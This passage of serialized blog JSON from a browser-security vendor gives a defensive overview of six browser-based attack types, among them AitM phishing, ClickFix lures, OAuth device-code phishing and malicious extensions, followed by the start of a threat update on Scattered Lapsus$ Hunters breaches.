and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration. ",[],{},{"nodeType":499,"data":2089,"content":2093},{"target":2090},{"sys":2091},{"id":2092,"type":504,"linkType":505},"3SrKOgpedLMQRpKIZqUQur",[],{"nodeType":455,"data":2095,"content":2096},{},[2097,2101,2110],{"nodeType":448,"value":2098,"marks":2099,"data":2100},"Whereas phishing was once entirely focused on credential theft, modern phishing attacks see the attacker intercept the victim’s session on the target app, using reverse-proxy Attacker-in-the-Middle kits that are the standard choice for attackers today. This means most forms of MFA can be bypassed, with the exception of passkeys (though attackers are finding ways to work around passkeys using ",[],{},{"nodeType":580,"data":2102,"content":2104},{"uri":2103},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fmfa-downgrade-attacks\u002F",[2105],{"nodeType":448,"value":2106,"marks":2107,"data":2109},"downgrade attacks",[2108],{"type":588},{},{"nodeType":448,"value":2111,"marks":2112,"data":2113},"). ",[],{},{"nodeType":455,"data":2115,"content":2116},{},[2117],{"nodeType":448,"value":2118,"marks":2119,"data":2120},"There are other key differences to be aware of too. Today, phishing operates on an industrial scale, using an array of obfuscation and detection evasion techniques. The latest generation of fully customized AitM phishing kits are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",[],{},{"nodeType":455,"data":2122,"content":2123},{},[2124],{"nodeType":448,"value":2125,"marks":2126,"data":2127},"This means that traditional anti-phishing tools at the email and network layer are struggling to keep up, with many attacks evading email-based detections (or bypassing email altogether). At the same time, proxy-based solutions now see a garbled mess of JavaScript code without the necessary context of what is actually happening in the browser to be able to piece it together effectively. Even if they don’t realize it, this means many organizations are now relying solely on blocking known-bad sites and hosts — a wildly ineffective solution with the rate that attackers refresh and rotate their phishing infrastructure. ",[],{},{"nodeType":455,"data":2129,"content":2130},{},[2131],{"nodeType":448,"value":2132,"marks":2133,"data":2134},"These changes make phishing more effective than ever, and increasingly difficult to detect and block without being able to observe and analyze web pages that a user interacts with in real time — something only possible with browser-level visibility. ",[],{},{"nodeType":499,"data":2136,"content":2140},{"target":2137},{"sys":2138},{"id":2139,"type":504,"linkType":505},"NHu0Q6ac9mLOPPMoswB8B",[],{"nodeType":515,"data":2142,"content":2143},{},[],{"nodeType":519,"data":2145,"content":2146},{},[2147],{"nodeType":448,"value":2148,"marks":2149,"data":2151},"2. Malicious copy and paste (aka. ClickFix, FileFix, etc.)",[2150],{"type":452},{},{"nodeType":455,"data":2153,"content":2154},{},[2155],{"nodeType":448,"value":2156,"marks":2157,"data":2158},"Since late 2024, attackers have been tricking users into performing malicious actions under the pretext of \"fixing\" an issue for a webpage to load. The most common scenarios relate to \"verifying that you are human,\" styled as a version of the bot protection challenges we're all used to encountering on the internet today. ",[],{},{"nodeType":499,"data":2160,"content":2164},{"target":2161},{"sys":2162},{"id":2163,"type":504,"linkType":505},"4Tp6KL7yz8CdxdKu5ieWMt",[],{"nodeType":455,"data":2166,"content":2167},{},[2168,2172,2180,2184,2192],{"nodeType":448,"value":2169,"marks":2170,"data":2171},"Microsoft's Digital Defense Report identified ClickFix as the ",[],{},{"nodeType":580,"data":2173,"content":2175},{"uri":2174},"https:\u002F\u002Fcdn-dynmedia-1.microsoft.com\u002Fis\u002Fcontent\u002Fmicrosoftcorp\u002Fmicrosoft\u002Fmsc\u002Fdocuments\u002Fpresentations\u002FCSR\u002FMicrosoft-Digital-Defense-Report-2025.pdf",[2176],{"nodeType":448,"value":2177,"marks":2178,"data":2179},"most common initial access vector, accounting for 47% of observed attacks",[],{},{"nodeType":448,"value":2181,"marks":2182,"data":2183},". CrowdStrike recorded a ",[],{},{"nodeType":580,"data":2185,"content":2187},{"uri":2186},"https:\u002F\u002Fwww.crowdstrike.com\u002Fexplore\u002F2026-global-threat-report",[2188],{"nodeType":448,"value":2189,"marks":2190,"data":2191},"563% increase in fake CAPTCHA ClickFix lures",[],{},{"nodeType":448,"value":2193,"marks":2194,"data":2195},". Push's own detection data tells a similar story: ClickFix made up an average of 52% of detections through Q2 2026, surpassing all other browser-based attack categories for the first time.",[],{},{"nodeType":455,"data":2197,"content":2198},{},[2199],{"nodeType":448,"value":2200,"marks":2201,"data":2202},"Traditional ClickFix-style attacks are a hybrid of browser and endpoint targeting. While delivered via the browser, the user copies and runs malicious scripts on their endpoint, targeting a wide range of legitimate, pre-installed system tools that allow commands to be run (Living Off the Land Binaries, or LOLBins). This results in the user installing malicious software on their machine — typically Remote Access Tools (RATs) and infostealer malware.",[],{},{"nodeType":455,"data":2204,"content":2205},{},[2206,2210,2215],{"nodeType":448,"value":2207,"marks":2208,"data":2209},"Notably, ClickFix remains a trap that users fall into rather than something they're targeted with directly. ",[],{},{"nodeType":448,"value":2211,"marks":2212,"data":2214},"4 in 5 ClickFix payloads intercepted by Push are accessed from search engines",[2213],{"type":452},{},{"nodeType":448,"value":2216,"marks":2217,"data":2218}," — the result of compromised sites, malvertising, and SEO poisoning. This naturally means they completely bypass email-based security controls. ",[],{},{"nodeType":455,"data":2220,"content":2221},{},[2222,2226,2234],{"nodeType":448,"value":2223,"marks":2224,"data":2225},"ClickFix continues to spawn new tools and sub-techniques. ClickFix-as-a-Service platforms are achieving 60% victim conversion rates. Payloads are highly variable, with Push capturing 84 distinct command forms targeting 16+ different system binaries. EtherHiding — storing kit configuration on public blockchains — means there's no host to take down and no domain to block. Attackers are also using shared conversations on AI chatbot platforms like ",[],{},{"nodeType":580,"data":2227,"content":2229},{"uri":2228},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fllmshare-malvertising-campaign\u002F",[2230],{"nodeType":448,"value":2231,"marks":2232,"data":2233},"ChatGPT and Claude to deliver malware",[],{},{"nodeType":448,"value":2235,"marks":2236,"data":2237}," via pages hosted on trusted, legitimate domains.",[],{},{"nodeType":455,"data":2239,"content":2240},{},[2241],{"nodeType":448,"value":2242,"marks":2243,"data":2244},"These varied delivery mechanisms and payloads make ClickFix tricky for traditional security tools to detect in real time. However, every ClickFix attack and variant happens in the browser with a malicious copy and paste event, which is where browser-based tools like Push have a great opportunity to intercept them.",[],{},{"nodeType":499,"data":2246,"content":2250},{"target":2247},{"sys":2248},{"id":2249,"type":504,"linkType":505},"29Y7nRr39TiUyvAwinYctG",[],{"nodeType":515,"data":2252,"content":2253},{},[],{"nodeType":519,"data":2255,"content":2256},{},[2257],{"nodeType":448,"value":2258,"marks":2259,"data":2261},"3. Authorization phishing",[2260],{"type":452},{},{"nodeType":455,"data":2263,"content":2264},{},[2265,2269,2277],{"nodeType":448,"value":2266,"marks":2267,"data":2268},"While AiTM phishing targets the login — the moment a user proves their identity — a growing class of attacks targets what happens after the login. Instead of stealing a session from the authentication flow, ",[],{},{"nodeType":580,"data":2270,"content":2272},{"uri":2271},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fauthorization-phishing",[2273],{"nodeType":448,"value":2274,"marks":2275,"data":2276},"authorization phishing",[],{},{"nodeType":448,"value":2278,"marks":2279,"data":2280}," abuses OAuth authorization mechanisms — consent grants, device code flows, and token exchanges — to obtain access tokens. The attacker never touches the authentication flow at all, which means every form of MFA, including phishing-resistant passkeys, is irrelevant.",[],{},{"nodeType":455,"data":2282,"content":2283},{},[2284],{"nodeType":448,"value":2285,"marks":2286,"data":2287},"Three techniques currently fall under the authorization phishing umbrella:",[],{},{"nodeType":455,"data":2289,"content":2290},{},[2291,2295,2299,2307],{"nodeType":448,"value":266,"marks":2292,"data":2294},[2293],{"type":452},{},{"nodeType":448,"value":2296,"marks":2297,"data":2298}," sees the victim authorize a third-party app via an OAuth consent grant. This can be an app the attacker has created, or a legitimate SaaS app tenant — you can simply sign up for an account and ",[],{},{"nodeType":580,"data":2300,"content":2302},{"uri":2301},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fopenai-poisoned-tenant-attack",[2303],{"nodeType":448,"value":2304,"marks":2305,"data":2306},"invite targets to your app tenant",[],{},{"nodeType":448,"value":2308,"marks":2309,"data":2310},". Identity providers have substantially hardened their defaults against consent phishing (Microsoft now blocks unverified third-party app consent by default, for example), which is why attackers have increasingly shifted to the next two techniques.",[],{},{"nodeType":455,"data":2312,"content":2313},{},[2314,2318,2322,2330,2334,2339],{"nodeType":448,"value":261,"marks":2315,"data":2317},[2316],{"type":452},{},{"nodeType":448,"value":2319,"marks":2320,"data":2321}," targets a different OAuth flow entirely: the RFC 8628 device authorization grant, originally designed for input-constrained devices like smart TVs. The attacker generates a code, delivers it to the victim via a phishing page, and the victim enters the code on the real identity provider's device login page. Push has tracked a ",[],{},{"nodeType":580,"data":2323,"content":2325},{"uri":2324},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fdevice-code-phishing",[2326],{"nodeType":448,"value":2327,"marks":2328,"data":2329},"37.5x increase in device code phishing attacks",[],{},{"nodeType":448,"value":2331,"marks":2332,"data":2333}," in 2026, with ",[],{},{"nodeType":448,"value":2335,"marks":2336,"data":2338},"30+ distinct kits",[2337],{"type":452},{},{"nodeType":448,"value":2340,"marks":2341,"data":2342}," now offering the technique. Because device code phishing targets apps already consented in the user's tenant (usually first-party Microsoft apps), it sidesteps the consent restrictions that shut down traditional consent phishing.",[],{},{"nodeType":455,"data":2344,"content":2345},{},[2346,2350,2354,2362,2366,2374],{"nodeType":448,"value":1536,"marks":2347,"data":2349},[2348],{"type":452},{},{"nodeType":448,"value":2351,"marks":2352,"data":2353}," occupies a middle ground — a ClickFix-OAuth hybrid that targets the standard authorization code grant flow rather than the device code flow. ",[],{},{"nodeType":580,"data":2355,"content":2357},{"uri":2356},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fconsentfix\u002F",[2358],{"nodeType":448,"value":2359,"marks":2360,"data":2361},"First observed in Russian APT29 campaigns",[],{},{"nodeType":448,"value":2363,"marks":2364,"data":2365},", it has since been ",[],{},{"nodeType":580,"data":2367,"content":2369},{"uri":2368},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fconsentfix-v3-analyzing-a-new-toolkit\u002F",[2370],{"nodeType":448,"value":2371,"marks":2372,"data":2373},"commoditized into criminal tooling",[],{},{"nodeType":448,"value":2375,"marks":2376,"data":2377},".",[],{},{"nodeType":455,"data":2379,"content":2380},{},[2381],{"nodeType":448,"value":2382,"marks":2383,"data":2384},"Preventing malicious OAuth grants requires tight in-app management of user permissions and tenant security settings across every app in the estate. Conditional access policies help, but their effectiveness varies significantly by technique — \"require compliant device\" blocks device code phishing but not ConsentFix, while \"block device code flow\" breaks legitimate use cases like Azure CLI and conference room hardware. Browser-based security tools are well positioned to observe OAuth grants across all apps accessed in the browser — even the ones the security team doesn't manage or know about.",[],{},{"nodeType":499,"data":2386,"content":2390},{"target":2387},{"sys":2388},{"id":2389,"type":504,"linkType":505},"1Fxgll8d4vVwtkGdwIAgkm",[],{"nodeType":515,"data":2392,"content":2393},{},[],{"nodeType":519,"data":2395,"content":2396},{},[2397],{"nodeType":448,"value":2398,"marks":2399,"data":2401},"4. Malicious browser extensions",[2400],{"type":452},{},{"nodeType":455,"data":2403,"content":2404},{},[2405],{"nodeType":448,"value":2406,"marks":2407,"data":2408},"Attackers use malicious extensions to steal data, log keystrokes, and intercept credentials and tokens as they transit the browser. ",[],{},{"nodeType":499,"data":2410,"content":2414},{"target":2411},{"sys":2412},{"id":2413,"type":504,"linkType":505},"5fuigCAUuHxP49KjWgP8SO",[],{"nodeType":455,"data":2416,"content":2417},{},[2418,2422,2430],{"nodeType":448,"value":2419,"marks":2420,"data":2421},"Most malicious extensions didn't start that way — attackers begin with a legitimate extension and bide their time, waiting until install counts reach maximum impact before deploying a malicious update. It's ",[],{},{"nodeType":580,"data":2423,"content":2425},{"uri":2424},"https:\u002F\u002Fsecureannex.com\u002Fblog\u002Fbuying-browser-extensions\u002F",[2426],{"nodeType":448,"value":2427,"marks":2428,"data":2429},"very easy for attackers to buy and add malicious updates",[],{},{"nodeType":448,"value":2431,"marks":2432,"data":2433}," to existing extensions, easily passing extension web store security checks.",[],{},{"nodeType":455,"data":2435,"content":2436},{},[2437],{"nodeType":448,"value":2438,"marks":2439,"data":2440},"There are four common entry paths: phish the developer of a popular extension; offer to buy a widely-installed extension outright; vibe-code your own extension and market it to users; or upload a malicious version and let user browsers auto-update on next launch.",[],{},{"nodeType":455,"data":2442,"content":2443},{},[2444,2448,2453,2457,2465],{"nodeType":448,"value":2445,"marks":2446,"data":2447},"Permissions alone don't indicate risk, since nearly every extension has exploitable ones — ",[],{},{"nodeType":448,"value":2449,"marks":2450,"data":2452},"46.76% of extensions across Push customers have the permission combinations needed for account takeover with no user interaction",[2451],{"type":452},{},{"nodeType":448,"value":2454,"marks":2455,"data":2456},". The most dangerous let attackers intercept sensitive data, credentials, and session tokens in transit. Malicious extensions routinely evade static and sandbox analysis via dynamically compiled, smuggled code, letting them reach official stores and even earn \"Featured\" or \"Verified\" status. AI browser extensions add a further dimension: the ",[],{},{"nodeType":580,"data":2458,"content":2460},{"uri":2459},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fresources\u002Freports\u002Fdbir\u002F",[2461],{"nodeType":448,"value":2462,"marks":2463,"data":2464},"Verizon DBIR 2026",[],{},{"nodeType":448,"value":2466,"marks":2467,"data":2468}," found that more than 15% of corporate users had unauthorized AI browser extensions installed — extensions that collect and retain browsing context from internal sites, creating a data exfiltration pathway that operates independently of traditional DLP controls.",[],{},{"nodeType":455,"data":2470,"content":2471},{},[2472,2476,2484,2488,2496],{"nodeType":448,"value":2473,"marks":2474,"data":2475},"Generally, your employees should not be randomly installing browser extensions unless pre-approved by your security team. But the reality is that many organizations have very little visibility of the extensions their employees are using, and the potential risk they're exposed to as a result. Static risk scoring is a ",[],{},{"nodeType":580,"data":2477,"content":2479},{"uri":2478},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhy-browser-extension-risk-scoring-wont-predict-your-next-breach\u002F",[2480],{"nodeType":448,"value":2481,"marks":2482,"data":2483},"poor predictor of supply chain compromise",[],{},{"nodeType":448,"value":2485,"marks":2486,"data":2487}," — every major breach of the past 18 months involved extensions that scored as low-risk beforehand. A default-deny approach with ",[],{},{"nodeType":580,"data":2489,"content":2491},{"uri":2490},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fbrowser-extension-management-guide\u002F",[2492],{"nodeType":448,"value":2493,"marks":2494,"data":2495},"allowlisting plus monitoring for change events",[],{},{"nodeType":448,"value":2497,"marks":2498,"data":2499}," is more effective than risk-score-based removal.",[],{},{"nodeType":499,"data":2501,"content":2505},{"target":2502},{"sys":2503},{"id":2504,"type":504,"linkType":505},"6WRUfE4LepAQ35hRz2UlH1",[],{"nodeType":515,"data":2507,"content":2508},{},[],{"nodeType":519,"data":2510,"content":2511},{},[2512],{"nodeType":448,"value":2513,"marks":2514,"data":2516},"5. Credential stuffing and ghost logins",[2515],{"type":452},{},{"nodeType":455,"data":2518,"content":2519},{},[2520],{"nodeType":448,"value":2521,"marks":2522,"data":2523},"Password-based compromise remains one of the leading causes of breaches. This might surprise you if you think that SSO solved credential attacks. ",[],{},{"nodeType":499,"data":2525,"content":2529},{"target":2526},{"sys":2527},{"id":2528,"type":504,"linkType":505},"5RJyr7JbVhUnccMIMsGtnE",[],{"nodeType":455,"data":2531,"content":2532},{},[2533,2537,2545],{"nodeType":448,"value":2534,"marks":2535,"data":2536},"But SSO isn't universal — SAML often costs extra, requires admin setup, and self-adopted apps rarely get configured, while most apps allow simultaneous login methods and don't restrict login methods. The result is ",[],{},{"nodeType":580,"data":2538,"content":2540},{"uri":2539},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fhow-many-vulnerable-identities-do-you-have\u002F",[2541],{"nodeType":448,"value":2542,"marks":2543,"data":2544},"ghost logins",[],{},{"nodeType":448,"value":2546,"marks":2547,"data":2548},": backup credentials outside SSO, invisible to IdP logs, created at adoption and still active unless disabled — gaps that stay hidden since most orgs focus MFA at the IdP layer, not on local app config, until an attacker finds them.",[],{},{"nodeType":455,"data":2550,"content":2551},{},[2552],{"nodeType":448,"value":2553,"marks":2554,"data":2555},"The data supports this. Of the last million logins observed by Push:",[],{},{"nodeType":566,"data":2557,"content":2558},{},[2559,2574,2589],{"nodeType":570,"data":2560,"content":2561},{},[2562],{"nodeType":455,"data":2563,"content":2564},{},[2565,2570],{"nodeType":448,"value":2566,"marks":2567,"data":2569},"1 in 4",[2568],{"type":452},{},{"nodeType":448,"value":2571,"marks":2572,"data":2573}," were password logins, not SSO",[],{},{"nodeType":570,"data":2575,"content":2576},{},[2577],{"nodeType":455,"data":2578,"content":2579},{},[2580,2585],{"nodeType":448,"value":2581,"marks":2582,"data":2584},"2 in 5",[2583],{"type":452},{},{"nodeType":448,"value":2586,"marks":2587,"data":2588}," were not protected by MFA",[],{},{"nodeType":570,"data":2590,"content":2591},{},[2592],{"nodeType":455,"data":2593,"content":2594},{},[2595,2600],{"nodeType":448,"value":2596,"marks":2597,"data":2599},"1 in 5",[2598],{"type":452},{},{"nodeType":448,"value":2601,"marks":2602,"data":2603}," used a weak, breached, or reused password",[],{},{"nodeType":455,"data":2605,"content":2606},{},[2607,2611,2619,2623,2628,2632,2638],{"nodeType":448,"value":2608,"marks":2609,"data":2610},"And the external sources also paint this picture. ",[],{},{"nodeType":580,"data":2612,"content":2614},{"uri":2613},"https:\u002F\u002Fcf-assets.www.cloudflare.com\u002Fslt3lc6tev37\u002FsWDBUMNVtEJB9ZFLt1dUU\u002F8d69e92de2edfb3bf59e7d21d57e7e1a\u002FCloudflare-2026-threat-report.pdf",[2615],{"nodeType":448,"value":2616,"marks":2617,"data":2618},"Cloudflare's 2026 Threat Report",[],{},{"nodeType":448,"value":2620,"marks":2621,"data":2622}," found that ",[],{},{"nodeType":448,"value":2624,"marks":2625,"data":2627},"63% of all human logins involve credentials already compromised elsewhere",[2626],{"type":452},{},{"nodeType":448,"value":2629,"marks":2630,"data":2631},". And the ",[],{},{"nodeType":580,"data":2633,"content":2634},{"uri":2459},[2635],{"nodeType":448,"value":2462,"marks":2636,"data":2637},[],{},{"nodeType":448,"value":2639,"marks":2640,"data":2641}," found that 50% of ransomware victims had a credential or infostealer event within 95 days prior to the attack, with infostealers surfacing an average of 2,362 breached corporate credentials per month from organizational email domains.",[],{},{"nodeType":455,"data":2643,"content":2644},{},[2645],{"nodeType":448,"value":2646,"marks":2647,"data":2648},"Logins can be observed in the browser — in fact, it's as close to a universal source of truth as you're going to get about how your employees are actually logging in, which apps they're using, and whether MFA is present, enabling security teams to find and fix vulnerable logins before they can be exploited.",[],{},{"nodeType":499,"data":2650,"content":2654},{"target":2651},{"sys":2652},{"id":2653,"type":504,"linkType":505},"1tX9gSZ51VEmXjRliTXuPV",[],{"nodeType":515,"data":2656,"content":2657},{},[],{"nodeType":519,"data":2659,"content":2660},{},[2661],{"nodeType":448,"value":2662,"marks":2663,"data":2665},"6. Session hijacking",[2664],{"type":452},{},{"nodeType":455,"data":2667,"content":2668},{},[2669],{"nodeType":448,"value":2670,"marks":2671,"data":2672},"Session hijacking (aka token replay) allows attackers to bypass the authentication process by taking an already-approved session token that they've stolen from the victim's device or browser, and reusing it in their own browser. This enables them to get around even phishing-resistant authentication controls like passkeys.",[],{},{"nodeType":455,"data":2674,"content":2675},{},[2676],{"nodeType":448,"value":2677,"marks":2678,"data":2679},"This is different to AiTM attacks, which see a new session created via the attacker's reverse-proxy connection to the target app. Sessions can be stolen using a variety of methods, some of which we've already discussed. Malicious browser extensions can extract them from webpages visited by the user, for example. But the most prominent source of stolen tokens is infostealer malware — also the leading source of stolen credentials powering credential stuffing attacks.",[],{},{"nodeType":455,"data":2681,"content":2682},{},[2683,2687,2694,2697,2702],{"nodeType":448,"value":2684,"marks":2685,"data":2686},"As mentioned previously, ClickFix is now the go-to method for delivering malware like infostealers. ClickFix is more detection-resistant than a normal file download, which is more likely to be intercepted and analyzed by controls like a web sandbox before hitting the endpoint and more likely to trigger endpoint alarms during execution. The problem extends beyond managed corporate machines, too: the ",[],{},{"nodeType":580,"data":2688,"content":2689},{"uri":2459},[2690],{"nodeType":448,"value":2691,"marks":2692,"data":2693},"Verizon DBIR 2025",[],{},{"nodeType":448,"value":2620,"marks":2695,"data":2696},[],{},{"nodeType":448,"value":2698,"marks":2699,"data":2701},"46% of infostealer infections that lead to corporate breaches originate on non-managed devices",[2700],{"type":452},{},{"nodeType":448,"value":2703,"marks":2704,"data":2705}," — personal machines, developer workstations, and contractor laptops where EDR is absent.",[],{},{"nodeType":455,"data":2707,"content":2708},{},[2709,2713,2721],{"nodeType":448,"value":2710,"marks":2711,"data":2712},"There's also a less obvious path for session theft. ",[],{},{"nodeType":580,"data":2714,"content":2716},{"uri":2715},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fbrowser-sync-attacks-where-personal-account-hacks-lead-to-corporate-breaches\u002F",[2717],{"nodeType":448,"value":2718,"marks":2719,"data":2720},"Browser sync features",[],{},{"nodeType":448,"value":2722,"marks":2723,"data":2724}," create a bridge between personal and corporate credential stores, meaning personal account or device compromises can directly lead to corporate breaches — as demonstrated in the Okta incident below, where corporate credentials had been synced to an engineer's personal Google account via Chrome profile sync.",[],{},{"nodeType":499,"data":2726,"content":2730},{"target":2727},{"sys":2728},{"id":2729,"type":504,"linkType":505},"51WVinSAV5wN7mVny7v9QC",[],{"nodeType":515,"data":2732,"content":2733},{},[],{"nodeType":444,"data":2735,"content":2736},{},[2737],{"nodeType":448,"value":2738,"marks":2739,"data":2741},"Conclusion",[2740],{"type":452},{},{"nodeType":455,"data":2743,"content":2744},{},[2745,2749,2757],{"nodeType":448,"value":2746,"marks":2747,"data":2748},"Attacks are increasingly happening in the browser. That makes it the perfect place to detect and respond to these attacks. But right now, the browser is a blind-spot for most security teams — ",[],{},{"nodeType":580,"data":2750,"content":2752},{"uri":2751},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002F7-things-omdias-latest-report-tells-us-about-the-secure-enterprise-browser-market",[2753],{"nodeType":448,"value":2754,"marks":2755,"data":2756},"according to Omdia",[],{},{"nodeType":448,"value":2758,"marks":2759,"data":2760},", 49% of organizations suffered a successful browser-based attack in the last 12 months, and browser security is now a top-five priority for 88% of organizations. ",[],{},{"nodeType":455,"data":2762,"content":2763},{},[2764],{"nodeType":448,"value":2765,"marks":2766,"data":2767},"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.",[],{},{"nodeType":455,"data":2769,"content":2770},{},[2771],{"nodeType":448,"value":2772,"marks":2773,"data":2774},"Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.",[],{},{"nodeType":455,"data":2776,"content":2777},{},[2778,2782,2791],{"nodeType":448,"value":2779,"marks":2780,"data":2781},"If you want to learn more about how Push helps you to detect and stop attacks in the browser, ",[],{},{"nodeType":580,"data":2783,"content":2785},{"uri":2784},"https:\u002F\u002Fpushsecurity.com\u002Fdemo",[2786],{"nodeType":448,"value":2787,"marks":2788,"data":2790},"book some time with one of our team for a live demo",[2789],{"type":588},{},{"nodeType":448,"value":2375,"marks":2792,"data":2793},[],{},"6 browser-based attacks every security team should be prepared for","What security teams need to know about the browser-based attack techniques that are the leading cause of breaches.","2026-09-15T00:00:00.000Z","6-browser-based-attacks-every-security-team-should-be-prepared-for",{"items":2799},[2800,2804],{"sys":2801,"name":2803},{"id":2802},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":2805,"name":2807},{"id":2806},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":2809},[2810],{"fullName":431,"firstName":432,"jobTitle":433,"profilePicture":2811},{"url":437},{"__typename":1924,"sys":2813,"content":2815,"title":4109,"synopsis":4110,"hashTags":60,"publishedDate":4111,"slug":4112,"tagsCollection":4113,"authorsCollection":4119},{"id":2814},"vLb3RhwYt7Xc6mkX3pWyI",{"json":2816},{"data":2817,"content":2818,"nodeType":440},{},[2819,2826,2829,2837,2867,2875,2881,2912,3027,3068,3076,3131,3162,3168,3171,3179,3186,3194,3211,3266,3272,3279,3298,3304,3311,3317,3324,3330,3337,3343,3351,3394,3425,3444,3475,3483,3514,3545,3576,3584,3591,3610,3664,3695,3703,3721,3764,3767,3775,3782,3789,3807,3813,3820,3932,3974,3982,4001,4008,4011,4019,4026,4069,4076,4079,4085,4091],{"data":2820,"content":2821,"nodeType":455},{},[2822],{"data":2823,"marks":2824,"value":2825,"nodeType":448},{},[],"Feeling overwhelmed with the amount of cyber news stories? Tired of dodging AI vendors boasting about their agents escaping the lab? This threat landscape update cuts through the noise and covers the key developments that security teams need to be on top of.",{"data":2827,"content":2828,"nodeType":515},{},[],{"data":2830,"content":2831,"nodeType":444},{},[2832],{"data":2833,"marks":2834,"value":2836,"nodeType":448},{},[2835],{"type":452},"The SLH playbook becomes the industry standard",{"data":2838,"content":2839,"nodeType":455},{},[2840,2844,2852,2856,2863],{"data":2841,"marks":2842,"value":2843,"nodeType":448},{},[],"Criminals associated with \"The Com,\" broadly known as the ",{"data":2845,"content":2847,"nodeType":580},{"uri":2846},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-lapsus-hunters",[2848],{"data":2849,"marks":2850,"value":2851,"nodeType":448},{},[],"Scattered Lapsus$ Hunters",{"data":2853,"marks":2854,"value":2855,"nodeType":448},{},[]," collective, have spent the past three years establishing a playbook ",{"data":2857,"content":2858,"nodeType":580},{"uri":2002},[2859],{"data":2860,"marks":2861,"value":2862,"nodeType":448},{},[],"focused on identity compromise and cloud data theft",{"data":2864,"marks":2865,"value":2866,"nodeType":448},{},[]," for extortion. They've dominated the news when it comes to public breaches: a sign of their effectiveness, or perhaps more their desire for notoriety (something that has come back to bite individuals later with a series of arrests, but hasn't hampered the overall trajectory of the breaches).",{"data":2868,"content":2869,"nodeType":455},{},[2870],{"data":2871,"marks":2872,"value":2874,"nodeType":448},{},[2873],{"type":452},"Regardless, the data doesn't lie. Of the browser and identity-related breaches we've tracked, groups linked to \"The Com\" such as Scattered Spider, ShinyHunters, and Lapsus$ are responsible for roughly 70% (not just in 2026, but since the start of 2024). ",{"data":2876,"content":2880,"nodeType":499},{"target":2877},{"sys":2878},{"id":2879,"type":504,"linkType":505},"3hODobO3VJr3LvbXkzso8I",[],{"data":2882,"content":2883,"nodeType":455},{},[2884,2888,2896,2900,2908],{"data":2885,"marks":2886,"value":2887,"nodeType":448},{},[],"The trump card of prolific criminal groups like Scattered Spider, Lapsus$, and ShinyHunters has always been their social engineering skill. Last year, they had huge success in ",{"data":2889,"content":2891,"nodeType":580},{"uri":2890},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-spider-defending-against-help-desk-scams",[2892],{"data":2893,"marks":2894,"value":2895,"nodeType":448},{},[],"tricking help desks into performing account resets",{"data":2897,"marks":2898,"value":2899,"nodeType":448},{},[],". This year, they've switched to using voice-based lures in tandem with ",{"data":2901,"content":2903,"nodeType":580},{"uri":2902},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-latest-slh-campaign",[2904],{"data":2905,"marks":2906,"value":2907,"nodeType":448},{},[],"browser-based phishing payloads",{"data":2909,"marks":2910,"value":2911,"nodeType":448},{},[]," — usually impersonating IT staff under the guise of \"setting up passkeys.\"",{"data":2913,"content":2914,"nodeType":455},{},[2915,2919,2927,2931,2939,2943,2951,2955,2963,2967,2975,2979,2987,2991,2999,3003,3011,3015,3023],{"data":2916,"marks":2917,"value":2918,"nodeType":448},{},[],"The vishing-to-SSO-takeover campaign has been prolific, running continuously since January: ",{"data":2920,"content":2922,"nodeType":580},{"uri":2921},"https:\u002F\u002Fwww.securityweek.com\u002Fpanera-bread-data-breach-linked-to-shinyhunters-sso-campaign\u002F",[2923],{"data":2924,"marks":2925,"value":2926,"nodeType":448},{},[],"Panera Bread",{"data":2928,"marks":2929,"value":2930,"nodeType":448},{},[]," (~14M records), ",{"data":2932,"content":2934,"nodeType":580},{"uri":2933},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fmatch-group-breach-exposes-data-from-hinge-tinder-okcupid-and-match\u002F",[2935],{"data":2936,"marks":2937,"value":2938,"nodeType":448},{},[],"Match Group",{"data":2940,"marks":2941,"value":2942,"nodeType":448},{},[]," (Hinge, Tinder, OkCupid; 10M+ records), ",{"data":2944,"content":2946,"nodeType":580},{"uri":2945},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fexpansion-shinyhunters-saas-data-theft",[2947],{"data":2948,"marks":2949,"value":2950,"nodeType":448},{},[],"Betterment",{"data":2952,"marks":2953,"value":2954,"nodeType":448},{},[]," (~20M records), ",{"data":2956,"content":2958,"nodeType":580},{"uri":2957},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fshinyhunters-extortion-gang-claims-odido-breach-affecting-millions\u002F",[2959],{"data":2960,"marks":2961,"value":2962,"nodeType":448},{},[],"Odido",{"data":2964,"marks":2965,"value":2966,"nodeType":448},{},[]," (6.2M Dutch telecom customers with BSNs and IBANs exposed), 